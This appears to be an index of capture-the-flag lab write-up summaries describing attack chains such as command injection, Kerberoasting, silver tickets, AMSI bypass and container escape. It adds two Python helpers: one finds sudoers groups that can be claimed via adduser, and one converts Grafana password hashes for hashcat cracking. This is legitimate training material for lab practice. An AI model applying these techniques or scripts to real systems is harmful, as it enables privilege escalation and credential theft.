Hybrid (Chain Easy)
Hybrid is a Chain that mixes a Linux and a Windows machine. It starts with Roundcube Webmail on HTTP, where alias identities can be abused to force command injection, leading to a reverse shell. Once on the box, /etc/exports shows /opt/share exported read/write, which allows privilege escalation to the user peter. From there, tunnelling through to the Windows side reveals an ESC1-vulnerable certificate template on which Domain Computers have enrollment rights and the enrollee supplies the subject, allowing privilege escalation to Administrator.

Initial Nmap

Two IPs to scan.

Nmap scan report for 10.10.160.197
Host is up (0.16s latency).
Not...
Manage (Linux Easy)
Manage is an Easy Linux machine that starts with Java RMI, enumerated using beanshooter. Enumeration shows that authentication on the remote MBean server is not required, and we gather credentials along the way; with this we get a foothold on the machine as the tomcat user. In /etc/passwd we see other users to attack. Trying to escalate to useradmin, the gathered password is reused, but after entering it we are asked for a verification code. useradmin's home contains a backup tar file; pulling it to our machine yields a copy of that user's home directory, including an SSH key we can use to get on the box and a .google_authenticator file with PINs to try. That gets us an SSH session as useradmin. Checking sudo privileges, we have ALL:ALL on /usr/sbin/adduser. A typical sudoers file grants sudo to the admin group (%admin), and no such group exists on the box, so we can add a user named admin: adduser creates a same-named primary group for the new user, so the user lands in the admin group...
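The sudoers trick above generalises: any %group entry in sudoers whose group is missing from /etc/group can be "claimed" with sudo adduser, because adduser (USERGROUPS=yes in /etc/adduser.conf, the Debian/Ubuntu default) creates a primary group named after the new user. The script below is an added example, not the writeup's own code; it parses constructed sudoers and /etc/group samples (invented for this example, not copied from the machine) and lists the claimable groups. It ignores #include/@include directives, so on a real host you would also check /etc/sudoers.d.

```python
"""Find sudoers group grants whose group does not exist yet.

Added example, not from the post. On Debian/Ubuntu, adduser creates a
primary group named after the new user, so `sudo adduser <name>` where
<name> matches a '%<name>' sudoers entry for a group that is missing from
/etc/group hands the new user that group's sudo rights.
"""
import re

# sudoers user-spec lines that start with %group (ignores %:nonunix groups
# and comment lines); the trailing \S requires a host list after the name
GROUP_SPEC = re.compile(r"^\s*%([A-Za-z0-9_.-]+)\s+\S")


def sudo_groups(sudoers_text: str) -> set:
    """Return the group names granted something in a sudoers file."""
    found = set()
    for line in sudoers_text.splitlines():
        line = line.split("#", 1)[0]  # strip comments; include directives drop too
        m = GROUP_SPEC.match(line)
        if m:
            found.add(m.group(1))
    return found


def existing_groups(group_text: str) -> set:
    """Return group names from /etc/group-style content."""
    return {line.split(":", 1)[0] for line in group_text.splitlines() if ":" in line}


def claimable_groups(sudoers_text: str, group_text: str) -> list:
    """Sudo-granting groups absent from /etc/group, sorted for stable output."""
    return sorted(sudo_groups(sudoers_text) - existing_groups(group_text))


# Constructed sample input for this example (not copied from the machine).
SAMPLE_SUDOERS = """\
Defaults        env_reset
root            ALL=(ALL:ALL) ALL
%admin          ALL=(ALL) ALL
%sudo           ALL=(ALL:ALL) ALL
useradmin       ALL=(ALL:ALL) /usr/sbin/adduser
"""

SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:
tomcat:x:1000:
useradmin:x:1001:
"""

if __name__ == "__main__":
    for g in claimable_groups(SAMPLE_SUDOERS, SAMPLE_GROUP):
        print(f"sudo adduser {g}   # creates user and group '{g}', matched by %{g}")
```

/etc/sudoers is normally mode 0440 and unreadable to a low-privileged user, which is why the writeup reasons from the stock Ubuntu sudoers (where %admin and %sudo are both granted) rather than reading the file; feed that default text to the functions above and compare it with the host's /etc/group, which is world-readable.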
Retro2 (Windows Easy)
Retro2 is an Easy Windows machine that starts with Guest authentication enabled on SMB, where a share exposes a Microsoft Access database file. Credentials found inside let us collect a BloodHound dump, which shows a relatively simple path with some twists: we find a couple of pre-Windows 2000 computer accounts and change the password of one of them. That account in turn lets us change/reset the password of the computer account ADMWS01$, which carries an attribute that permits the reset. Having done that, we can add our user to the Services group, which grants RDP access. Once we have a session, we find that on this version of Windows Server 2008 we control the full path stored in a Windows registry value, which lets us escalate to NT AUTHORITY\SYSTEM.

Initial Nmap

PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15F75)...
Breach (Windows Medium)
Breach is a Medium Windows box that starts with Guest authentication to SMB shares. Having read/write access to one share, we upload a .lnk file and capture a user's NTLMv2 hash. After cracking it, the account is used to Kerberoast SPNs, which yields a TGS hash for the svc_mssql service account. With that service account's cracked password we can forge a silver ticket for the MSSQL service; presenting it, we connect to the MSSQL instance as Administrator and run commands via xp_cmdshell. A reverse shell only works after bypassing AMSI. Once on the machine, our privileges include SeImpersonatePrivilege, so with GodPotato we create a user, add them to the Administrators group, and connect as that admin via evil-winrm.

Initial Nmap

PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-28 00:08:14Z)
135/tcp open msrpc ...
Data (Linux Easy)
Data starts with Grafana running on port 3000. Using the unauthenticated arbitrary file read vulnerability (CVE-2021-43798) we exfiltrate grafana.ini and grafana.db. With these we can use a Python script to convert the stored user hashes and salts into a format hashcat accepts (Grafana stores PBKDF2-HMAC-SHA256 hashes). Cracking one gets us on the box as boris. His sudo privileges allow docker exec; to get root inside the container we run sudo /snap/bin/docker exec --privileged -u 0 -it grafana /bin/bash. From there df -h shows the host's disk device, and since we are root in a privileged container we can mkdir /mnt/pwnd and mount /dev/xXxXx /mnt/pwnd. This gives us read, write, and execute access to the host filesystem from inside the container.

Initial Nmap

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
3000/tcp open ppp? syn-ack ttl 62 HTTP (Port 3000 - Grafana)

Going to this shows a login page...
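The conversion script the writeup mentions is not shown on this page, so the following is an added example, not the author's script. It assumes the legacy Grafana scheme: user.password holds the hex of PBKDF2-HMAC-SHA256(password, user.salt, 10000 rounds, 50 bytes), which hashcat cracks as mode 10900 in the form sha256:rounds:base64(salt):base64(digest). The grafana.db rows are replaced by an in-memory SQLite table with one invented user, salt and password so the script runs offline; a real run would open the exfiltrated grafana.db instead.

```python
"""Turn Grafana user rows from grafana.db into hashcat mode 10900 input.

Added example, not the post's own script. Assumed (legacy Grafana) scheme:
user.password = hex(PBKDF2-HMAC-SHA256(password, user.salt, 10000 rounds, 50 bytes)).
"""
import base64
import hashlib
import hmac
import sqlite3

ROUNDS = 10000   # Grafana's PBKDF2 iteration count (assumed)
DKLEN = 50       # derived key length in bytes, stored as 100 hex characters


def grafana_hash(password: str, salt: str) -> str:
    """Reproduce what Grafana writes into user.password for a given salt."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), ROUNDS, DKLEN)
    return dk.hex()


def verify(candidate: str, stored_hex: str, salt: str) -> bool:
    """Test one candidate password against a stored hash (constant-time compare)."""
    return hmac.compare_digest(grafana_hash(candidate, salt), stored_hex)


def to_hashcat(login: str, stored_hex: str, salt: str) -> str:
    """Build a 'login:sha256:rounds:b64salt:b64digest' line for hashcat -m 10900 --username."""
    b64_salt = base64.b64encode(salt.encode()).decode()
    b64_digest = base64.b64encode(bytes.fromhex(stored_hex)).decode()
    return f"{login}:sha256:{ROUNDS}:{b64_salt}:{b64_digest}"


def hashcat_lines(conn: sqlite3.Connection) -> list:
    """Read every user (table "user": login, password, salt) and convert each row."""
    rows = conn.execute('SELECT login, password, salt FROM "user"').fetchall()
    return [to_hashcat(login, pw, salt) for login, pw, salt in rows if pw and salt]


def build_sample_db() -> sqlite3.Connection:
    """Constructed stand-in for grafana.db so the example runs offline.

    The login, salt and password are invented for this example; a real run
    would use sqlite3.connect('grafana.db') on the exfiltrated file.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute('CREATE TABLE "user" (login TEXT, password TEXT, salt TEXT)')
    conn.execute('INSERT INTO "user" VALUES (?, ?, ?)',
                 ("admin", grafana_hash("Winter2021!", "Ab3dEf6hIj"), "Ab3dEf6hIj"))
    conn.commit()
    return conn


if __name__ == "__main__":
    for line in hashcat_lines(build_sample_db()):
        print(line)
```

Write the lines to a file and run hashcat -m 10900 --username against it; verify() is there so a single guess can be confirmed without hashcat, and to sanity-check the conversion against a known password before spending GPU time on a broken format.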
Slonik (Linux Medium)
Slonik is a Linux box built around reusing a Unix socket and the ability to forward it over SSH. It starts with a host running NFS; showmount lists two exports, /var/backups and /home. Home is interesting: a .bash_history and a .psql_history show commands that were previously run. rpcinfo shows sockets in use. From that information we create the directory /tmp/sock and use it together with the PID recorded at the end of the .bash_history. Using SSH we forward and connect to the socket created by postgres. Once connected, we get a reverse shell using a PoC from HackTricks. With a shell, we run pspy64 and see a cron job running /usr/bin/backup, a script that backs up everything in the postgres HOME directory. By copying /usr/bin/bash into that home directory, making it executable and setting the setuid bit, we can get root.

Initial Nmap

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
111/tcp ...
Retro (Windows Easy)
Retro is an Easy Windows box built around pre-created Windows 2000 computer accounts. Pre-creating a computer means adding a computer object to AD without joining a host to the domain right away; the object just gets used later. There is a "Pre-Windows 2000" compatibility option that can be selected when creating a computer in ADUC, still present in Windows Server 2022. A computer created with this option gets a password equal to the computer name in lowercase without the trailing '$'. Authenticating as that computer account lets us look at the ADCS templates in use, one of which is vulnerable, leading to privilege escalation to Administrator. Resource from Medium.

Initial Nmap

# Nmap 7.94SVN scan initiated Wed Nov 6 22:09:30 2024 as: /usr/lib/nmap/nmap -v -sVC -oN Evidence/Scans/initial.log 10.10.111.122
Nmap scan report for 10.10.111.122
Host is up (0.17s...